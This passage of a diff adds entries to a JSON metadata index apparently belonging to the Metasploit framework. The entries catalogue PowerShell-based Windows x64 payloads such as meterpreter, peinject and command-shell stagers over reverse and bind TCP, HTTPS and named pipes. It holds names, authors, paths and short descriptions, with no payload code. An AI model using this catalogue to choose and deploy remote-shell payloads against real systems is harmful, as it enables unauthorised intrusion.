"session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/powershell/x64/meterpreter/reverse_winhttps": { + "name": "Powershell Exec, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/powershell/x64/peinject/bind_ipv6_tcp": { + "name": "Powershell Exec, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/peinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + 
"author": [ + "Spencer McIntyre", + "ege ", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/peinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/x64/peinject/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/x64/peinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/peinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + 
"session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/peinject/bind_named_pipe": { + "name": "Powershell Exec, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/x64/peinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "UserExistsError" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/peinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/peinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/powershell/x64/peinject/bind_tcp": { + "name": "Powershell Exec, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/peinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a 
connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/powershell/x64/peinject/bind_tcp_rc4": { + "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/x64/peinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp_rc4", 
+ "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/x64/peinject/bind_tcp_uuid": { + "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/powershell/x64/peinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/peinject/reverse_named_pipe": { + "name": "Powershell Exec, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/powershell/x64/peinject/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + 
"arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/peinject/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/peinject/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/powershell/x64/peinject/reverse_tcp": { + "name": "Powershell Exec, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/peinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp" + }, + 
"payload_cmd/windows/powershell/x64/peinject/reverse_tcp_rc4": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/x64/peinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/x64/peinject/reverse_tcp_uuid": { + "name": "Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/powershell/x64/peinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + 
"autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/pingback_reverse_tcp": { + "name": "Powershell Exec, Windows x64 Pingback, Reverse TCP Inline", + "fullname": "payload/cmd/windows/powershell/x64/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to attacker and report UUID (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/pingback_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/x64/powershell_bind_tcp": { + "name": "Powershell Exec", + "fullname": "payload/cmd/windows/powershell/x64/powershell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + 
"type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/powershell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/powershell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/x64/powershell_reverse_tcp": { + "name": "Powershell Exec", + "fullname": "payload/cmd/windows/powershell/x64/powershell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/powershell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": 
"windows/x64/powershell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/x64/powershell_reverse_tcp_ssl": { + "name": "Powershell Exec", + "fullname": "payload/cmd/windows/powershell/x64/powershell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/powershell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/powershell_reverse_tcp_ssl", + "staged": false + }, + "payload_cmd/windows/powershell/x64/shell/bind_ipv6_tcp": { + "name": "Powershell Exec, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": 
"/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/shell/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/x64/shell/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/x64/shell/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/shell/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/shell/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/shell/bind_named_pipe": { + "name": "Powershell Exec, Windows x64 Command Shell, Windows 
x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/x64/shell/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "UserExistsError" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/shell/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/shell/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/powershell/x64/shell/bind_tcp": { + "name": "Powershell Exec, Windows x64 Command Shell, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": 
"cmd/windows/powershell/x64/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/shell/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/powershell/x64/shell/bind_tcp_rc4": { + "name": "Powershell Exec, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/x64/shell/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/shell/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/shell/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/x64/shell/bind_tcp_uuid": { + "name": "Powershell Exec, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/powershell/x64/shell/bind_tcp_uuid", + "aliases": [], + "rank": 
300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/shell/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/shell/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/shell/reverse_tcp": { + "name": "Powershell Exec, Windows x64 Command Shell, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + 
"notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/powershell/x64/shell/reverse_tcp_rc4": { + "name": "Powershell Exec, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/x64/shell/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/x64/shell/reverse_tcp_uuid": { + "name": "Powershell Exec, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/powershell/x64/shell/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer 
McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/shell_bind_tcp": { + "name": "Powershell Exec, Windows x64 Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/windows/powershell/x64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection and spawn a command shell (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": 
